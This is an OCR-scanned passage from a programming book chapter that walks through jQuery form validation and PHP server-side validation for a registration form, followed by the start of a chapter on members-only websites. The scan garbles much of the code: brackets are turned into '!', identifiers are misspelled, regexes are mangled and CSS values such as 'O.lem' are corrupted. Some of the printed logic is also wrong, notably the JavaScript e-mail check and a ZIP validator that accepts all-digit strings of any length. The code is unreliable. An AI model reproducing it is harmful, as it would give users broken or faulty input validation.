The JavaScript being loaded is jQuery from a Content Delivery Network 
(CDN) and your own JavaScript file. 

The next area of interest is setting up the form itself, with this code: 

<form id="userForm" method="POST" action="form-process.php"> 

That code creates a form that will use the HTTP POST method and call a PHP 
file named form-process .php. Directly below the form is an empty <div> 
element. This is used to provide feedback for the user that an error has 
occurred: 


<div id="errorDiv"></div> 


Form elements are added next. The various form elements on this page all 
follow the same general pattern with a <label> followed by an <input> 
and then a <span> for error feedback. The <span> element is hidden 
through the CSS. More on that later. 
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<label for="name">Name:* </label> 

<input tYpe="text" id="name'' name="name" > 

<span class="errorFeedback errorSpan" id="nameError">Name is 
required</span> 

<br /> 

The CSS for the form looks like this: 

form fieldset { 

display: inline-block; 

} 

.radioButton { 

float: none; 
display: inline; 
margin-right: O.lem; 
width: 2em; 

} 

form label { 

width: 8em; 
margin-right: lem; 
float: left; 
text-align: right; 
display: block; 

} 

form input { 

width: 15em; 

} 

#submit { 

margin-top: 2em; 
float: right; 

} 

That CSS sets up the look and feel of the form elements, including the width 
and alignment of the various elements. The next part of the CSS handles the 
error displays that provide visual and textual feedback to the user when 
something goes wrong. 

.errorClass { 

background-color: #CC6666; 

} 

#errorDiv { 

color: red; 

} 

.errorFeedback { 

visibility: hidden; 


} 
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Adding JavaScript Vatidation 

Now it’s time to add JavaScript validation to the web form. Since you have 
a form, you need to connect to the form’s submit event. Since you’re using 
jQuery, doing so is really, really easy. The basic process is to check for 
errors, and if errors are found, to stop the “default” action from occurring. 

The “default” action for a form is to submit to a server (or whatever’s in the 
action attribute on the form). But if an error occurs, we might as well save 
that round-trip to the server and back and just keep the user right on the 
form to correct the mistakes. 

For this validation, set up a validation function and then call that function 
from within the submit event handler. Doing so means that you can keep all 
the validation logic within a single function, which makes maintenance and 
troubleshooting easier. 

Here’s an exercise to add a submit handler and a validation function. 

1. Open form. j s within your editor. 

The file should look like this: 

$(document).ready(function() { 

alert("hello"); 

}) ; 

2. Remove alert ("hello"); from the code. In its place, add the 
following code: 

$("#userForm").submit(function(e) { 

var errors = validateForm(); 
if (errors == "") { 
return true; 

} else { 

e.preventDefault(); 
return false; 

} 

}) ; 

function validateForm() { 

var errorFields = new ArraY(); 
return errorFields; 

} 

The file now looks like this: 

$(document).ready(function() { 

$ (" #userForm'') . submit ( function (e) { 

var errors = validateForm(); 
if (errors == "") { 
return true; 

} else { 

e.preventDefault(); 
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return false; 

} 

}) ; 

function validateForin () { 

var errorFields = new Array(); 
return errorFields; 

} //end function validateForm 


}) ; 

3. Save the file (with the same name, form, j s) in your document root. 

If. Reload the form.php page within your weh browser. 

There shouldn’t be any changes to the form, even on submit; you 
haven’t added any validation yet, just the foundation for it. 

Add rudimentary validation, to check that required fields have something 
in them. 

5. Within the validateForm() function, after the errorFields declara¬ 
tion, add the following code: 

//Check required fields have something in them 
if ($('#name').val() == "") { 
errorFields.push('name'); 

} 

if ($('#email').val() == "") { 
errorFields.push('email'); 

} 

if ($('#passwordl').val() == "") { 
errorFields.push('passwordl'); 

} 

The code for that function should look like this: 

function validateForm!) { 

var errorFields = new Array!); 

//Check required fields have something in them 
if !$!'#name').val!) == "") { 
errorFields.push!'name'); 

} 

if !$!'#email').val!) == "") { 
errorFields.push 1'email'); 

} 

if !$!'#passwordl').val!) == "") { 
errorFields.push!'passwordl'); 

} 

return errorFields; 

} //end function validateForm 

6. Save the file (as form, j s) in your document root. 

7. Reload the form.php page through your browser. 
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8. Without filling in any form fields, click Submit Query. 

Notice that the form doesn’t appear to do anything at all. This is 
expected. 

9. Fill in the Name, E-mail Address, and Password fields with something. 

Anything will do. 

10. With those fields filled in, click Submit Query. 

The form should submit and give a Page Not Found (or similar) error 
because the form’s action hasn’t been set up yet. 

11. Click Back to go back to the form. 

Now you have basic validation for required fields in place but no feedback 
for the user. Adding feedback is a matter of activating the CSS classes that 
you already set up in a prior exercise. 
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Providing feedback to form users 

The general pattern for the feedback on this form will be to highlight the 
field that needs attention and activate messaging for the individual field and 
the overall form. 

To facilitate providing feedback, create two new functions in form. js. 

1. Open f orm, j s in your editor, if it isn’t already open. 

2. Within form. J s, add the following functions, after the validateFo 2 :m 
function: 

function provideFeedback(incomingErrors) { 

for (var i = 0; i < incomingErrors. length; i++) 

{ 

$("#" + incomingErrors[i]) . 
addClass("errorClass"); 

$("#" + incomingErrors[i] + "Error").removeC 
lass("errorEeedback"); 

} 

$("#errorDiv").html("Errors encountered"); 

} 

function removeEeedback() { 

$("#errorDiv").html(""); 

$('input').each(function() { 

$(this).removeClass("errorClass"); 

}) ; 

$('.errorSpan').each(function() { 

$(this).addClass("errorEeedback"); 

}) ; 


} 
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3. With those functions in the file, you next need to call them. 

The call to the removeFeedback function is added right away within 
the submit handler so that error feedback is cleared when the form is 
submitted. That call looks like this: 

removeFeedback(); 

The provideFeedback function needs to be added within the else 
condition in the form’s submit handler and looks like this: 

provideFeedback(errors) ; 

The submit handler should now look like this: 

$(”#userForm").submit(function(e) { 

removeFeedback(); 
var errors = validateForm(); 
if (errors == "") { 
return true; 

} else { 

provideFeedback(errors) ; 
e.preventDefault(); 
return false; 

} 

}) ; 

It. Save the file (as form, j s) within your document root. 

At this point, the entire file should consist of this: 

$(document).ready(function() { 

$("#userForm").submit(function(e) { 
removeFeedback(); 
var errors = validateForm(); 
if (errors == "") { 
return true; 

} else { 

provideFeedback(errors); 
e.preventDefault(); 
return false; 

} 

}) ; 

function validateForm() { 

var errorFields = new ArraY(); 

//Check required fields have something in them 
if ($('#name').val() == "") { 
errorFields.push('name'); 

} 

if ($('#email').val() == "") { 
errorFields.push('email'); 

} 

if ($('#passwordl').val() == "") { 
errorFields.push('passwordl'); 

} 
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return errorFields; 

} //end function validateForm 

function provideFeedback(incomingErrors) { 

for (var i = 0; i < incomingErrors. length; i++) 

{ 

$("#'' + incomingErrors [i]) . 
addClass("errorClass"); 

$("#" + incomingErrors[i] + "Error"). 
removeClass("errorFeedback"); 

} 

$("#errorDiv").html("Errors encountered"); 


function removeEeedback() { 

$("#errorDiv").html(""); 

$('input').each(function() { 

$(this).removeClass("errorClass"); 

}) ; 

$('.errorSpan').each(function() { 

$(this).addClass("errorEeedback"); 

}) ; 


}) ; 

5. Reload form.php in your browser. 

6 . Clear any information from the fields, if any was saved by your 
browser. 

7. Within empty fields in the form, click Submit Query. 

You should receive errors like those shown in Figure 3-4. 


Figure 3-4: 

Errors 

provided 

through 

JavaScript. 


http://ttffd/b6tVform.l P - B 0 X || gAform 


CD ☆ © 


User Information 
Errors encountered 
Name;* 
City. 
State: 
ZIP: 

E-mail Address;* 
Telephone 
Number; 

Password:* 
\'erifv Password;* 


I Name is required 


I E-mail is required 


Number T>"pe; © Work © Home 

I Password required 
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8 . Fill in the Name field and click Submit Query. 

The feedback indicating there was an error in the Name field should 
clear, but the others will remain, as in Figure 3-5. 


Figure 3-5: 

Correcting 
one error in 
the form. 




http://tt/fd/b6c3/fortn.i P 8 C X || ^ Aform 


n ID ^ ® 


User Information 
Errors encountered 


Name:* Steve 
City: 


State: 

ZIP: 

E-mail Address:* 
Telephone 
Number: 

Password:* 
Verifv Password:* 


I E-mail is required 


Number T>'pe: 


© Work © Home 

I Password required 




9. Fill in details within the E-mail Address and Password fields and click 
Submit Query. 

The form should submit, again giving a Page Not Found or similar error. 

Refining the Oatidation 

Now you’ve checked your required fields and provided feedback to the user. 
Next up, you need to refine the validation. Prior to doing so, you should 
pause and look at the code you’ve added for validation. 

The submit event handler is set up through jQuery’s submit () function: 

$ (" #userForm'') . submit ( function (e) { 

removeFeedback() ; 
var errors = validateForm(); 
if (errors == "") { 
return true; 

} else { 

provideFeedback(errors); 
e.preventDefault(); 
return false; 

} 

}) ; 

Within the submit () function, the first thing that happens is any feedback 
is removed. Next, the validateForm () function is called and anything that 
comes back from that function is set into the errors variable. If the errors 
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variable is empty, then the submit () function returns Boolean true, which 
essentially tells the browser, “Everything’s okay; go ahead and submit the 
form.” However, if errors are encountered, the provideFeedback () function 
is called and the default actions (to submit the form) are stopped, thanks to 
the preventDefault and return false statements. 

The validateForm () function is the heart of the validation logic for the form. 

function validateForm() { 

var errorFields = new Array(); 

//Check required fields have something in them 
if ($('#name').val() == "") { 
errorFields.push('name'); 

} 

if ($('#email').val() == "”) { 
errorFields.push('email'); 

} 

if ($('#passwordl').val() == "") { 
errorFields.push('passwordl'); 

} 

return errorFields; 

} //end function validateForm 

In this function, an array is instantiated to hold the error fields. This enables 
you to store more than one error instead of a single error at a time (which 
would be frustrating to the user). 

Each required field is retrieved using its ID. If the value of that field is "", 
then the ID of the field with the error is pushed onto the errorFields 
array. Finally, the errorFields array is returned and becomes the error 
array that you see in the submit () handler. 

Another way to accomplish this task would be to add a class to each element 
that’s required and then loop through each of the required classes with 
jQuery, like $ ( ' . required' ) . each (. 

With that validation, you can look at the provideFeedback () function: 

function provideFeedback(incomingErrors) { 

for (var i = 0; i < incomingErrors.length; i++) { 

$(”#" + incomingErrors[i]).addClass("errorClass"); 
$("#" + incomingErrors[i] "Error”). 
removeClass("errorFeedback"); 

} 

$("#errorDiv").html("Errors encountered"); 
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The provideFeedback () function loops through the incoming errors and 
adds the errorClass class to the fields. Recall from the CSS that this class 
simply sets the background color to a shade of red. Next, the errorFeedback 
class is removed. This class hides the textual feedback, so by removing the 
class, the feedback becomes visible to the user. Finally, outside of the loop, 
the errorDiv’s HTML is set to the phrase "Errors encountered". 

The final piece of the form, j s file (so far) is the removeFeedback () 
function: 

function removeFeedback!) { 

$("#errorDiv").html(""); 

$('input').each(function() { 

$(this).removeClass("errorClass"); 

}) ; 

$('.errorSpan').each(function() { 

$(this).addClass("errorFeedback"); 

}) ; 

} 

This function first sets the errorDiv’s HTML to blank. Next, each input has 
its errorClass removed and each errorSpan on the page has its error 
Feedback class added, which essentially hides them from visibility. All of 
this is done with the help of jQuery selectors and functions. 

Adding more Validation 

Looking at the validation you’ve done so far, a couple things are evident: 
First, the E-mail Address field can be filled in with an invalid e-mail address 
in it. Second, there’s nothing verifying that the passwords match. You next 
tackle both of those and one more for the phone number too. Luckily, you 
already have the underlying structure in place for validation, so refinements 
become much easier. 

Continue with more validation by adding a check to make sure the passwords 
match and that the e-mail address contains a period and an @ symbol. 

1 . Within the form, js file, add the following code in the validateFormf) 
function, prior to the return errorFields statement: 

// Check passwords match 

if ($('#password2').val() != $('#passwordl').val()) { 

errorFields.push('password2'); 

} 

//very basic e-mail check, just an @ symbol 
if (!($('#email').val().indexOf(".") >2) && 

($('#email').val().indexOf("@"))) { 
errorFields.push('email'); 

} 
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2. Save the file (as form, j s) in your document root. 

3. Load http: //localhost/form.php in your browser or reload the 
page if it’s already open. 

4. Enter something other than an e-mail address into the E-mail Address 
field. 

Specifically, don’t enter an @ symbol in your input. 

5. Click Submit Query. 

You should see a page like the one in Figure 3-6. 


Figure 3-6: 

Testing 

e-mail 

validation. 




Note that the error feedback indicates that e-mail is required. A further 
refinement would be to indicate that the address is invalid. 

6. Enter a valid e-mail address into the field and enter a password into 
the first Pcissword field. 


7. Click Submit Query. 


You now see an error indicating that the passwords don’t match, as 
depicted in Figure 3-7. 
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Figure 3-7: 

Testing 

password 

match 

validation. 


\S http://tt/fd/bti:3/form.l P - 8 0 X || gAform x] | ☆ 0 

User Information 
Errors encountered 
Name:* 

City: 

State: 

ZIP: 

E-mail Address:* 

Telephone 

Number: Number Tr-pe: O Work © Home 


Steve 


test@example.com 



Password:* 
Veri^' Password;* 



Passwords don't match 


Submit Ciueirv~ 


Breaking this code down, you see there were two validations added: one for 
password match and one for e-mail address validation. Here’s the password 
matching validation: 

if ($('#password2').val() != $('#passwordl').val()) { 

errorFields.push('password2'); 

} 

This code simply checks the value of both fields and if they don’t match, 
sets up an error connected to the password2 field of the form. 

The e-mail validation looks like this: 

//very basic e-mail check, just an @ symbol 
if (!($('#email').val().indexOf) >2) && ($('#email'). 
val().indexOf(”@"))) { 
errorFields.push('email'); 

} 

This validation looks for a single dot in the address and also looks for an @ 
symbol. Granted, this is very basic validation, but e-mail addresses are noto¬ 
riously complex things to check, given the number of valid variations and 
characters allowed in an address. 

One final area to validate: the phone number. Although it isn’t a required 
field, when it is filled in, it would be nice to make sure that it contains at 
least a certain number of digits. Also, if the phone number is filled in, then 
the Number Type field suddenly becomes required. 

Adding these checks won’t be quite as simple as the others, especially since 
the Number Type field is a radio button. Nevertheless, it isn’t too difficult to 
do so. Follow these steps. 
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1. Within form, js, add the following code in the validateForm() func¬ 
tion prior to the return errorFields statement: 

if ($('#phone').val() != "") { 

var phoneNum = $('#phone').val(); 
phoneNum.replace(/[^0-9]/g, "") ; 

if (phoneNum.length != 10) { 

errorFields.push("phone"); 

} 

if (!$('input[name=phonetYpe]:checked').val()) { 
errorFields.push("phonetype"); 

} 

} 

2. Save the file (as form, j s). 

3. Load the f orm.php page or reload if your browser is already open. 

4. Fill in the required fields correctly and a valid ten-digit phone number 
into the Phone Number field, but don’t select either of the Number 
Type options. Click Submit Query. 

You should receive a page like the one in Figure 3-8. 


Figure 3-8: 

Testing 

Number 

Type 

validation. 



User Information 

Errors encountered _ 

Name:* Steve 
Citi’. 

State; | ^ _ 

ZIP; _ 

E-mail Address;* test@example.com 
Telephone 7155551212 

Number; Number Type: ' tt’o rk © Home Please choose an option 

Password:* ••• 

Veri^' Password:* ••• 
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You can see from Figure 3-8 that the visual feedback isn’t very evident or 
easy to spot. To correct that, you need to add some CSS. 

5. Open form. css in your editor. 

6 . Within form, css, add the following CSS at the bottom of the file. 

.phoneTypeError { 

margin-left: 1.2em; 
padding: O.lem; 
background-color: #CC6666; 

} 

7. Reload form.php in your browser. 
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8 . Fill in the required fields correctly and then type a valid ten-digit 
phone number into the Phone Number field, but don’t select either of 
the Number Type options. Click Submit Query. 

You should now receive a page like the one in Figure 3-9. 


Figure 3-9: 

The Number 
Type 
validation 
feedback is 
now more 
visible. 


CO£ 


httpi//tt/fd/b6c3/form.html 


A form 


User Information 

Efiors encountered _ 

Name;* Steve 
City: 

State; | I3.I 

ZIP; 


E-mail Address:* 
Telephone 
Number: 
Password;* 
Veri^- Password:* 


test@example.com 

7156551212 

Number Type: O W’ork 

••• 


© 


Home 


ll^ 

fi)*® 





You now have some JavaScript validation complete, hut your job isn’t nearly 
done. What you’ve done so far is helped the user receive fast feedback for 
filling out the form. The main and most important area for true form valida¬ 
tion is within the server-side code, the PHP. 


Performing PHP Vatidation 

This section examines server-side validation with PHP. You use the HTML, 
CSS, and JavaScript from earlier in the chapter for the exercises in this sec¬ 
tion. The overall goal is to make sure that any input received from the user, 
whether from a web form, a web service, or elsewhere, is checked and 
sanitized. 

So far you’ve been using an HTML page called form. php that set up a web 
form. The action of that web form refers to a page called form-process . 
php. In this section, you build form-process .php and a success page, too. 

In order to pass errors back to the form, you need to use sessions. Additionally, 
you need to carve out a space to provide the error feedback from PHP within 
that form page. This means making some slight changes to the form.php 
file that you’ve been using. That seems like a logical place to start with an 
exercise. 
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1 . Open form.php in your editor. 

2. Within form.php, add the following code to the top, above the 
<doctype> declaration: 

<?php session_start(); ?> 

3 . Change the <div id="errorDiv''></div> line to look like this code: 
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The line should look like this when you’re done; 

<!-- <script tYpe="text/ javascript" src=" f orm.js"></ 
script> --> 

5. Save form.php. 

6 . Load the page in your browser at http: //localhost/form.php. 

There should be no change from previous times when you loaded the page. 
However, now you don’t have to fill anything in at all and the form will 
submit without error because the JavaScript validation has been temporarily 
removed. 

The PHP you added to form. php starts the session and then looks to see if 
the session variables named error and f ormAttempt are set. If those are 
set, then you know that there are errors and that the errors are the result of 
a form attempt. The formAttempt session variable is then unset. This helps 
for situations where users use the Back button in their browser. The form 
Attempt session variable will again be set next time they submit the form 
(as you see later). 

If errors are encountered, output is created to that effect and each error 
message is printed to the screen. (You test it shortly.) 


<div id="errorDiv"> 

<?php 

if (isset($_SESSION['error']) && isset($_ 
SESSION!'formAttempt'])) { 

unset($_SESSION['formAttempt']); 
print "Errors encountered<br />\n"; 
foreach ($_SESSION['error'] as $error) { 
print $error . "<br />\n"; 

} //end foreach 
} //end if 

?> 

</div> 

4. In order to test the PHP validation, you need to skip the JavaScript 
validation. Therefore, comment out the JavaScript validation file, 
foimi. js, so that it doesn’t load. 
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One other prerequisite item is to set up a success page. Follow these steps: 

1 . Create a new empty text file in your editor. 

2 . Place the following HTML in that file: 

<!doctYpe html> 

<html> 

<head> 

<title>A form - Success</title> 

</head> 

<bodY> 

<div> 

Thank you for registering 
</div> 

</body> 

</html> 

3 . Save the file as success .php in your document root. 

Vatidatin^ retfuired fietds 

With the prep work complete, you can now begin building the form-process 
page. You build this file in stages, starting with the basic framework and 
then adding more complex validation and features as you go. 

1 . Open your text editor and create a new file. 

2. In that file, place the following code: 

<?php 

//prevent access if they haven't submitted the form, 
if (!isset($_POST['submit'])) { 

die(header("Location: form.php")); 

} 

session_start(); 

$_SESSION['formAttempt'] = true; 

if (isset($_SESSION['error'])) { 

unset($_SESSION['error']); 

} 

$required = array("name","email","passwordl","passw 
ord2"); 

$_SESSION['error'] = array(); 

//Check required fields 

foreach ($required as $requiredField) { 

if (!isset($_POST[$requiredField]) || $_ 

POST[$requiredField] == "") { 
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$_SESSION['error'][] = $requiredField . " is 

required.”; 

} 


//final disposition 

if (isset($_SESSION['error']) && count($_ 

SESSION['error']) >0) { 

die(header("Location: form.php")); 

} else { 

unset($_SESSION['formAttempt']); 
die(header("Location: success.php")); 

} 

?> 

3. Save the file as fom-process .php in your document root. 

4. Load the main £oi:in.php fiie athttp: //localhost/form.php in 
your weh browser. 

5. Click Submit Query without hiling anything out in the form. 

You should receive a page like that in Figure 3-10. 


Figure 3-10: 

Verifying 

PHP 

validation. 


3Eari^ 


>j\lS http://l:t/fcl/b6c3/form.php 


S) ☆ ® 


User Information 
Errors encountered 
name is required, 
email is required, 
password! is required. 
password2 is required. _ 
Name;* 
Cit}': 

State; 

ZIP; 

E-mail Address;* 
Telephone 
Number; 

Password;* 
Veri^' Password;* 


2iL 


Number Tjpe; 


IX'ork O Home 


Submit Query 
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If you receive a page like those in any of the previous figures, with the text 
fields colored red, then the JavaScript validation is still firing. Make sure 
you’ve commented out the JavaScript from form.php, and make sure the 
page has been reloaded recently in your browser. 


Before continuing, look at this code since it serves as the basis for your PHP 
validation. 
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The first thing done in the file is to make sure it’s being hit from the form’s 
Submit button: 

//prevent access if they haven't submitted the form, 
if (!isset($_POST['submit'])) { 

die(header("Location: form.php")); 

} 

If that isn’t the case, then the browser is redirected back to form. php. 

Next up, the session is started and the f ormAttempt variable is set to true. 
Recall that this variable is used within the form. php page to indicate that 
the user has come from this process page versus reloading or using his or 
her Back button. 

Next, all the existing errors are unset. There is no need for them in the 
process page, and you need to recheck everything again. The error array is 
initialized again. 

if (isset($_SESSION['error'])) { 

unset($_SESSION['error']); 

} 

$_SESSION['error'] = array(); 

Next, an array is set up with the required fields. This makes adding required 
fields later an easy task. Just add them to this array: 

$required = array("name","email","passwordl","password2"); 

The heart of the basic required field validation is next, inside a for each 
loop: 

//Check required fields 

foreach ($required as $requiredField) { 

if (!isset($_POST[$requiredField]) || $_ 

POST[$requiredField] == "") { 

$_SESSION['error'][] = $requiredField . " is 

required."; 

} 

} 

If the field isn’t set or is empty, then an error element is added to the $_ 
SESSION [' error' ] array. 

Finally, if the $_SESSI0N [' error' ] array has any elements, you need to 
redirect back to the form page; otherwise, send them to the success page. 
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//final disposition 

if (count($_SESSION['error']) >0) { 

die(header("Location: form.php")); 

} else { 

unset($_SESSION['formAttempt']); 
die(header("Location: success.php")); 

} 

Vatidatinq^ text 

You’ve now checked to make sure that something is filled in for the required 
fields, hut you haven’t checked to see what they contain. For all you know, 
they could contain a single space. 

Validating text typically means using a regular expression. This condition can 
be added to form-process .php directly above the / /final disposition 
section: 

if (!preg_match('/^[\w .]+$/',$_POST['name'])) { 

$_SESSION['error'][] = "Name must be letters and numbers 
only."; 

} 

This code sets up a regular expression to look for anything that isn’t a letter 
or number (the \w part), a space, or a period. Obviously, if you have a form 
that allows other characters, they can be added to the character class. If you 
add that code to form-process .php and attempt to fill in something with 
other characters into the Name field, you’ll receive the error. 

Vatidating^ drop-doWns, radio 
buttons, and check boxes 

Validating data from drop-downs (or select/option elements), radio buttons, 
or check boxes should be done in the PHP. Even though it may appear that 
the users have to pick from one of the options, they may (maliciously or oth¬ 
erwise) not have that filled out correctly. It’s your job to make sure it’s valid. 

The following code sets up an array of the valid states (from the drop-down 
in form. php) and then looks to see if what’s being received is found in that 
valid array. This code can be added just above the final disposition section. 

validStates = array("Alabama","California","Colorado","Florid 
a","Illinois","New Jersey","New 
York","Wisconsin"); 

if (isset($_POST['state']) && $_POST['state'] != "") { 

if (!in_array($_POST['state'],$validStates)) { 

$_SESSI0N['error'][] = "Please choose a valid state"; 

} 

} 
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One item of note here is that you not only need to check to see if the state 
is set, but also need to see that it isn’t blank. You need to do this because 
tbe default value on the form is blank for this drop-down and the field isn’t 
required, so blank is a valid value. If it’s set and not blank, though, then it 
needs to be set to a valid value. 

The set of phone number type radio buttons is the same concept. Set up an 
array of valid values and check to make sure the value passed in is one of 
those valid values. Since this field isn’t required unless the phone number is 
filled in, save its check for later. 

Vatidatin^ numbers 

Validating numbers can involve a regular expression, if you’re expecting a 
certain format or number of digits, or can involve matb if you’re looking for 
certain values (or could be both too). 

ZIP code validation presents an easier case, so you tackle that first. You 
need to validate that only digits were entered into the ZIP field and that 
there are at least five and no more than nine digits in the field. You could do 
this with a single regular expression, but doing so would prevent you from 
returning a specific error message: You wouldn’t know if users filled in letters 
or if they only had four digits in the ZIP field. Therefore, the method you in 
the next exercise separates those two tests into their own conditional. 

This code can be added above tbe final disposition section: 

if (isset($_POST['zip']) && $_POST['zip'] != "") { 

if ( !preg_match( ' Z''[\d]+$/' , $_POST[ ' zip'] ) ) { 

$_SESSION['error'][] = "ZIP should be digits only."; 

} else if (strlen($_POST['zip']) < 5 || strlen($_ 

POST! 'zip']) >9) { 

$_SESSION['error'][] = "ZIP should be between 5 and 9 
digits"; 

} 

} 

Tbe code first checks to see if the ZIP is set. If it is set and isn’t empty, then 
the next check is to see if it contains only digits. If it contains something 
other than digits, then there’s no need to run the next test. If digits are all 
that’s found, then the next check can be run, to make sure the length is 
between 5 and 9 digits. 

Validating the phone number uses the same logic. If the phone field is set and 
not blank, then check to make sure it contains only digits. Next, the length is 
checked to make sure it’s at least ten digits. You could also add a maximum 
length check here, but this one will account for international numbers, too. 
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The phonetype field is checked next. If it isn’t set (and you know that it’s 
required because you’re inside of a conditional test checking whether the 
phone number was set), then you return an error. Assuming that it’s indeed 
set, check the value to make sure it’s one of the acceptable values for the 
field, similar to that done in the previous section for the state drop-down. 

This code can be added above the final disposition section in form- 
process . php. 

if (isset($_POST['phone']) && $_POST['phone'] != "”) { 

if (!preg_match('/^[\d]+$/',$_POST['phone'])) { 

$_SESSION['error'][] = "Phone number should be digits 
only"; 

} else if (strlen($_POST['phone']) < 10) { 

$_SESSION['error'][] = "Phone number must be at least 
10 digits"; 

} 

if (!isset($_POST['phonetype']) || $_POST['phonetype'] == 

"") { 

$_SESSION['error'][] = "Please choose a phone number 
type"; 

} else { 

$validPhoneTYpes = array("work”,"home"); 

if (!in_array($_POST['phonetype'],$validPhoneTypes)) 

{ 

$_SESSI0N['error'][] = "Please choose a valid 
phone number type."; 

} 

} 

} 

Vatidating^ URLs and e-mail addresses 

Truly validating an e-mail address is a surprisingly difficult task. The stan¬ 
dard for e-mail addresses allows for complex combinations of letters, 
numbers, and special characters, some of which can only appear in certain 
positions. PHP versions 5.2 and greater include a f ilter_var () function 
that takes this complexity away and makes it easier to filter things like e-mail 
addresses and URLs (among other things). 

This section examines validation of e-mail addresses and URLs. 

Vatidating an e-mail address 

The f ilter_var () function includes a number of built-in tests to check to 
see if an e-mail address is valid. Table 3-1 shows some of the built-in filters 
for validation. 
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Table 3-1 Select Validation Filters in PHP 

Fitter 

Description 

FILTER_VALIDATE_BOOLEAN 

Validates that a value is a Boolean. 

EILTER_VALIDATE_INT 

Validates that a number is an integer. 

EILTER_VALIDATE_ELOAT 

Validates that a number is a floating 
point number. 

EILTER_VALIDATE_IP 

Validates an IP address. 

EILTER_VALIDATE_EMAIL 

Validates an e-mail address. 

EILTER_VALIDATE_URL 

Validates a URL. 


Using the filters is very easy. For example, here’s the code to validate an 
e-mail address. This code could be plugged into the form-process .php file 
above the final disposition section: 

if (!filter_var($_POST['email'],FILTER_VALIDATE_EMAIL)) { 

$_SESSION['error'][] = "Invalid e-mail address"; 

} 

That code is all you need to validate an e-mail address in PHP. 

Validating a URL 

Though not included in the form used in this chapter, URLs can be validated 
in the same way. Say you have a variable called $url. The validation code 
looks the same; it just uses a different filter. 

if (!filter_var($url,FILTER_VALIDATE_URL)) { 

$_SESSION['error'][] = "Invalid URL"; 

} 

Making sure the passwords match 

Users who fill out this form need to enter their password twice. It’s then up 
to you to make sure that the passwords that a user entered are the same. 
Though this check occurs in the JavaScript, it also needs to occur in the 
PHP. 

Your form processing page has already checked to make sure there are 
values in both of the password fields on the form, so checking that they 
match is as simple as this: 

if ($_POST['passwordl'] != $_POST['password2']) { 

$_SESSION['error'][] = "Passwords don't match"; 

} 
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With that check, the form processing has been completed. Users can fill out 
the form and if, for some reason, the JavaScript didn’t catch an error, the 
error would be caught in the PHP. 

Listing 3-1 shows the final form process page built in this chapter. 


Listing 3-1: The Final Form Processing Page 

<?php 

//prevent access if they haven't submitted the form, 
if (!isset($_POST['submit'])) { 

die(header("Location: form.php")); 

} 

session_start(); 

$_SESSION['formAttempt'] = true; 

if (isset($_SESSION['error'])) { 

unset($_SESSION['error']); 

} 

$_SESSION ['error ' ] = arrayO; 

$required = array("name","email","passwordl","password2"); 

//Check required fields 

foreach ($required as $requiredField) { 

if (!isset($_POST[$requiredField]) || $_ 

POST[$requiredField] == "") { 

$_SESSION['error'][] = $requiredField . " is 

required."; 

} 

} 

if (!preg_match('/^[\w .]+$/',$_POST['name'])) { 

$_SESSION['error'][] = "Name must be letters and numbers 
only."; 

} 


$validStates = array("Alabama","California","Colorado","Flori 
da","Illinois","New Jersey","New 
York","Wisconsin"); 

if (isset($_POST['state']) && $_POST['state'] != "") { 

if (!in_array($_POST['state'],$validStates)) { 

$_SESSI0N['error'][] = "Please choose a valid state"; 

} 

} 

if (isset($_POST['zip']) && $_POST['zip'] != "") { 
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Listing 3-1 (continued) 

if ( !preg_match( ' Z''[\d]+$/' , $_POST[ ' zip'] ) ) { 

$_SESSION['error'][] = "ZIP should be digits only."; 

} else if (strlen($_POST['zip']) < 5 || strlen($_ 

POST['zip']) >9) { 

$_SESSION['error'][] = "ZIP should be between 5 and 9 
digits"; 

} 


if (isset($_POST['phone']) && $_POST['phone'] != "") { 

if ( !preg_match( ' Z''[\d]+$/', $_POST['phone']) ) { 

$_SESSION['error'][] = "Phone number should be digits 
only"; 

} else if (strlen($_POST['phone']) < 10) { 

$_SESSION['error'][] = "Phone number must be at least 
10 digits"; 

} 

if (!isset($_POST['phonetype']) || $_POST['phonetype'] == 

"") { 

$_SESSION['error'][] = "Please choose a phone number 
type"; 

} else { 

$validPhoneTypes = array("work","home"); 

if (!in_array($_POST['phonetype'],$validPhoneTypes)) 

{ 

$_SESSI0N['error'][] = "Please choose a valid 
phone number type."; 

} 

} 


if (!filter_var($_POST['email'],FILTER_VALIDATE_EMAIL)) { 

$_SESSION['error'][] = "Invalid e-mail address"; 

} 

if ($_POST['passwordl'] != $_POST['password2']) { 

$_SESSION['error'][] = "Passwords don't match"; 

} 

ZZfinal disposition 

if (count($_SESSION['error']) >0) { 

die(header("Location: form.php")); 

} else { 

unset($_SESSION['formAttempt']); 
die(header("Location: success.php")); 

} 

?> 
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Creating a iJatidation function 

The f ilter_var function goes a long way towards providing automated 
validation for common form elements. If you start working with forms, you’ll 
find that you need to validate the same things over and over again, like ZIP 
code or state, too. Unfortunately, there aren’t any built-in PHP functions to 
validate a ZIP code or state. But there’s nothing preventing you from creating 
one! 

For example, Listing 3-2 shows a function to validate a state. 


Listing 3-2: Creating a State Validation Function 

function is_valid_state($state) { 

$validStates = array ("Alabama'', "California'', "Colorado", "F 
lorida", "Illinois", "New Jersey", "New York", "Wisconsin") ,- 
if (in_array($state,$validStates)) { 
return true; 

} else { 

return false; 

} 

} //end function is_valid_state 
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This function accepts an argument of the state to check. The state is checked 
against the list of known states. If the state is found among that list, the 
function returns Boolean true, meaning that it’s a valid state. 

Listing 3-3 shows a function to validate the ZIP. 


Listing 3-3: Creating a ZIP Validation Function 

function is_valid_zip($zip) { 

if (preg_match('/^[\d]+$/',$zip)) { 

return true; 

} else if (strlen($zip) == 5 || strlen($zip) == 9) { 

return true; 

} else { 

return false; 

} 

} //end function is_valid_zip 

Like the state function, the function in Listing 3-3 also accepts an incoming 
argument, this time the ZIP code to validate. The same basic validation checks 
are performed in this function as they were in the non-functionalized version 
from the form-process .php file. If the ZIP is just digits and is either five or 
nine digits, then Boolean true is returned; otherwise, false is returned. 
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In most cases, you’d create these functions in an external file and then 
require that file wherever needed through require_once () or through 
your autoload process. For example, you included those validation functions 
in a file called validation. inc and then used the following line at the top 
of the form-process .php file. 

require_once("validation.inc”); 

Changing the form-process .php file to use these functions looks like this: 

if (isset($_POST['state']) && $_POST['state'] != "") { 

if (!is_valid_state($_POST['state'])) { 

$_SESSI0N['error'][] = "Please choose a valid state"; 

} 

} 

if (isset($_POST['zip']) && $_POST['zip'] != "") { 

if (!is_valid_zip($_POST['zip'])) { 

$_SESSION['error'][] = "ZIP code error."; 

} 

} 

Variations of these functions and concepts are used in the next chapter — 
and indeed throughout your career as a PHP programmer! 


Chapter 4 : Building a Memhers- 
Ont^f Website 


In This Chapter 

Understanding the concepts involved in authentication and authorization 

Adding a user database 

